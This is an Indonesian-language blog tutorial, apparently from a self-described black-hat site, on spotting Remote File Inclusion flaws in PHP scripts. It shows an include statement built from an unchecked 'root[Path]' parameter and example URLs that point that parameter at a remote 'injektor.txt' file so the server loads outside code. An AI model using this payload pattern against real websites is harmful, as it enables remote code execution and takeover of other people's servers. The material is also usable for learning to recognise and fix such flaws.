RFI turorial

Original Post By syaitonnirrojim
[+] sedikit tutorial bagaimana mendeteksi sebuah RFI vulnerabilty di dalam suatu CMS /php scripts

[+] dalam hal ini RFI adalah remote file include / inclusion dimana kita bisa melakukan require melalui injector //

[+] ok permisalan
1. misal file : function.php
2 di dalam source code funtion.php berisi scripts seperti

Code:

if(!$root['Path']){$root['Path'] = "./";}
include($root['Path']."config/config.php");

3. apabila dalam function.php gagal meng query / error di line XxX
kita dapat memasukkan injektor ..
4. dan code nya adalah :

Code:

http://127.0.0.1/path/function.php?root[Path]=

5. lalu tambahkan suatu injektor .. dan menjadi ..

Code:

http://127.0.0.1/path/function.php?root[Path]=http://127.0.0.1/injektor.txt

6. see what ? u got vuln woth RFI …
[+] sekedar tutorial dari saya .. mohon maaf apa bila ada salah / kekurangan dalam tutor ini ..
[+] ./e0f
[+] By masterhacked ~ original no copy paste ..

0 comments:

Posting Komentar

Langganan: Posting Komentar (Atom)
R3B3L - Design by : R3B3L @ 2010 - 2011 All Rights Reserved [+] We Are Black Hat [+]